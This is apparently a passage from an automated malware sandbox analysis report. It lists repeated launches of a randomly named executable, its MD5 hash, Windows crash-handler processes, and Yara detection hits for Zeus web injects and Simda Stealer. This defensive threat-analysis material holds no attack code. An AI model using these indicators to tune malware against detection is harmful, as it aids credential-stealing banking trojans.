                                                                                                                                                                                                              • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.1931351798.0000000002C70000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                              • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.1931013445.0000000002C70000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                              • Rule: JoeSecurity_SimdaStealer, Description: Yara detected Simda Stealer, Source: 00000002.00000003.1402494872.0000000000883000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                              • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.1402494872.0000000000883000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                              • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.1931983270.0000000002C70000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                              • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.1899806491.0000000002C70000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                              • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.1918926192.0000000002C70000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                              • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.1819482254.0000000002C70000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                              • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.1898993550.0000000002C70000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                              • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.1900285726.0000000002C70000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                              • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.1875983940.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                              • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.1932199583.0000000002C70000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                              • Rule: JoeSecurity_SimdaStealer, Description: Yara detected Simda Stealer, Source: 00000002.00000002.2639699727.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Author: Joe Security
                                                                                                                                                                                                              • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000002.2639699727.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Author: unknown
                                                                                                                                                                                                              • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.1891958770.0000000002C70000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                              • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.1918440128.0000000002C70000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                              • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.1887697552.0000000002C70000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                              • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.1892177129.0000000002C70000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                              • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.1885549848.0000000002C70000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                              • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.1893840816.0000000002C70000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                              • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.1755207141.0000000002C70000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                              • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                              • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.1936460278.0000000002C70000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                              Has exited:false

                                                                                                                                                                                                              General

                                                                                                                                                                                                              Target ID:5
                                                                                                                                                                                                              Start time:12:33:41
                                                                                                                                                                                                              Start date:11/11/2024
                                                                                                                                                                                                              Path:C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe
                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                              Commandline:"C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe"
                                                                                                                                                                                                              Imagebase:0x190000
                                                                                                                                                                                                              File size:140'800 bytes
                                                                                                                                                                                                              MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                              Yara matches:
                                                                                                                                                                                                              • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000005.00000002.1829128656.00000000008D0000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                              • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000005.00000002.1828939687.0000000000870000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                              General

                                                                                                                                                                                                              Target ID:6
                                                                                                                                                                                                              Start time:12:33:41
                                                                                                                                                                                                              Start date:11/11/2024
                                                                                                                                                                                                              Path:C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe
                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                              Commandline:"C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe"
                                                                                                                                                                                                              Imagebase:0x190000
                                                                                                                                                                                                              File size:140'800 bytes
                                                                                                                                                                                                              MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                              Yara matches:
                                                                                                                                                                                                              • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000006.00000002.1844458477.0000000000820000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                              • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000006.00000002.1844914899.0000000000880000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                              General

                                                                                                                                                                                                              Target ID:9
                                                                                                                                                                                                              Start time:12:33:41
                                                                                                                                                                                                              Start date:11/11/2024
                                                                                                                                                                                                              Path:C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe
                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                              Commandline:"C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe"
                                                                                                                                                                                                              Imagebase:0x190000
                                                                                                                                                                                                              File size:140'800 bytes
                                                                                                                                                                                                              MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                              Yara matches:
                                                                                                                                                                                                              • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000009.00000002.1857835167.00000000027C0000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                              • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000009.00000002.1859321562.0000000002BD0000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                              General

                                                                                                                                                                                                              Target ID:10
                                                                                                                                                                                                              Start time:12:33:41
                                                                                                                                                                                                              Start date:11/11/2024
                                                                                                                                                                                                              Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                              Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7376 -s 776
                                                                                                                                                                                                              Imagebase:0x460000
                                                                                                                                                                                                              File size:483'680 bytes
                                                                                                                                                                                                              MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                              General

                                                                                                                                                                                                              Target ID:12
                                                                                                                                                                                                              Start time:12:33:42
                                                                                                                                                                                                              Start date:11/11/2024
                                                                                                                                                                                                              Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                              Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7352 -s 748
                                                                                                                                                                                                              Imagebase:0x7ff6c9880000
                                                                                                                                                                                                              File size:483'680 bytes
                                                                                                                                                                                                              MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                              General

                                                                                                                                                                                                              Target ID:13
                                                                                                                                                                                                              Start time:12:33:43
                                                                                                                                                                                                              Start date:11/11/2024
                                                                                                                                                                                                              Path:C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe
                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                              Commandline:"C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe"
                                                                                                                                                                                                              Imagebase:0x190000
                                                                                                                                                                                                              File size:140'800 bytes
                                                                                                                                                                                                              MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                              Yara matches:
                                                                                                                                                                                                              • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 0000000D.00000002.1864825235.0000000000D70000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                              • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 0000000D.00000002.1866051279.0000000000DD0000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                              General

                                                                                                                                                                                                              Target ID:16
                                                                                                                                                                                                              Start time:12:33:43
                                                                                                                                                                                                              Start date:11/11/2024
                                                                                                                                                                                                              Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                              Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7328 -s 756
                                                                                                                                                                                                              Imagebase:0x460000
                                                                                                                                                                                                              File size:483'680 bytes
                                                                                                                                                                                                              MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                              General

                                                                                                                                                                                                              Target ID:17
                                                                                                                                                                                                              Start time:12:33:44
                                                                                                                                                                                                              Start date:11/11/2024
                                                                                                                                                                                                              Path:C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe
                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                              Commandline:"C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe"
                                                                                                                                                                                                              Imagebase:0x190000
                                                                                                                                                                                                              File size:140'800 bytes
                                                                                                                                                                                                              MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                              Yara matches:
                                                                                                                                                                                                              • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000011.00000002.1804322257.0000000000E10000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                              • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000011.00000002.1805040996.0000000000E70000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                              General

                                                                                                                                                                                                              Target ID:19
                                                                                                                                                                                                              Start time:12:33:44
                                                                                                                                                                                                              Start date:11/11/2024
                                                                                                                                                                                                              Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                              Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7304 -s 740
                                                                                                                                                                                                              Imagebase:0x460000
                                                                                                                                                                                                              File size:483'680 bytes
                                                                                                                                                                                                              MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                              General

                                                                                                                                                                                                              Target ID:20
                                                                                                                                                                                                              Start time:12:33:45
                                                                                                                                                                                                              Start date:11/11/2024
                                                                                                                                                                                                              Path:C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe
                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                              Commandline:"C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe"
                                                                                                                                                                                                              Imagebase:0x190000
                                                                                                                                                                                                              File size:140'800 bytes
                                                                                                                                                                                                              MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                              Yara matches:
                                                                                                                                                                                                              • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000014.00000002.1811513588.0000000002560000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                              • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000014.00000002.1809736468.0000000002170000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                              General

                                                                                                                                                                                                              Target ID:22
                                                                                                                                                                                                              Start time:12:33:46
                                                                                                                                                                                                              Start date:11/11/2024
                                                                                                                                                                                                              Path:C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe
                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                              Commandline:"C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe"
                                                                                                                                                                                                              Imagebase:0x190000
                                                                                                                                                                                                              File size:140'800 bytes
                                                                                                                                                                                                              MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                              Yara matches:
                                                                                                                                                                                                              • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000016.00000002.1814429100.0000000001220000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                              • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000016.00000002.1814626114.0000000001280000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                              General

                                                                                                                                                                                                              Target ID:24
                                                                                                                                                                                                              Start time:12:33:47
                                                                                                                                                                                                              Start date:11/11/2024
                                                                                                                                                                                                              Path:C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe
                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                              Commandline:"C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe"
                                                                                                                                                                                                              Imagebase:0x190000
                                                                                                                                                                                                              File size:140'800 bytes
                                                                                                                                                                                                              MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                              Yara matches:
                                                                                                                                                                                                              • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000018.00000002.1872752662.0000000000A30000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                              • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000018.00000002.1872402689.00000000009D0000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                              General

                                                                                                                                                                                                              Target ID:26
                                                                                                                                                                                                              Start time:12:33:48
                                                                                                                                                                                                              Start date:11/11/2024
                                                                                                                                                                                                              Path:C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe
                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                              Commandline:"C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe"
                                                                                                                                                                                                              Imagebase:0x190000
                                                                                                                                                                                                              File size:140'800 bytes
                                                                                                                                                                                                              MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                              Yara matches:
                                                                                                                                                                                                              • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 0000001A.00000002.1838904239.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                              • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 0000001A.00000002.1839056548.0000000001340000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                              General

                                                                                                                                                                                                              Target ID:28
                                                                                                                                                                                                              Start time:12:33:48
                                                                                                                                                                                                              Start date:11/11/2024
                                                                                                                                                                                                              Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                              Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7212 -s 740
                                                                                                                                                                                                              Imagebase:0x460000
                                                                                                                                                                                                              File size:483'680 bytes
                                                                                                                                                                                                              MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                              General

                                                                                                                                                                                                              Target ID:29
                                                                                                                                                                                                              Start time:12:33:49
                                                                                                                                                                                                              Start date:11/11/2024
                                                                                                                                                                                                              Path:C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe
                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                              Commandline:"C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe"
                                                                                                                                                                                                              Imagebase:0x190000
                                                                                                                                                                                                              File size:140'800 bytes
                                                                                                                                                                                                              MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                              Yara matches:
                                                                                                                                                                                                              • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 0000001D.00000002.1881382385.0000000000A40000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                              • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 0000001D.00000002.1882257401.0000000000AA0000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                              General

                                                                                                                                                                                                              Target ID:31
                                                                                                                                                                                                              Start time:12:33:50
                                                                                                                                                                                                              Start date:11/11/2024
                                                                                                                                                                                                              Path:C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe
                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                              Commandline:"C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe"
                                                                                                                                                                                                              Imagebase:0x190000
                                                                                                                                                                                                              File size:140'800 bytes
                                                                                                                                                                                                              MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                              Yara matches:
                                                                                                                                                                                                              • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 0000001F.00000002.1890678971.00000000029B0000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                              • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 0000001F.00000002.1891163811.0000000002D60000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                              General

                                                                                                                                                                                                              Target ID:33
                                                                                                                                                                                                              Start time:12:33:51
                                                                                                                                                                                                              Start date:11/11/2024
                                                                                                                                                                                                              Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                              Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 344 -s 732
                                                                                                                                                                                                              Imagebase:0x460000
                                                                                                                                                                                                              File size:483'680 bytes
                                                                                                                                                                                                              MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                              General

                                                                                                                                                                                                              Target ID:34
                                                                                                                                                                                                              Start time:12:33:52
                                                                                                                                                                                                              Start date:11/11/2024
                                                                                                                                                                                                              Path:C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe
                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                              Commandline:"C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe"
                                                                                                                                                                                                              Imagebase:0x190000
                                                                                                                                                                                                              File size:140'800 bytes
                                                                                                                                                                                                              MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                              Yara matches:
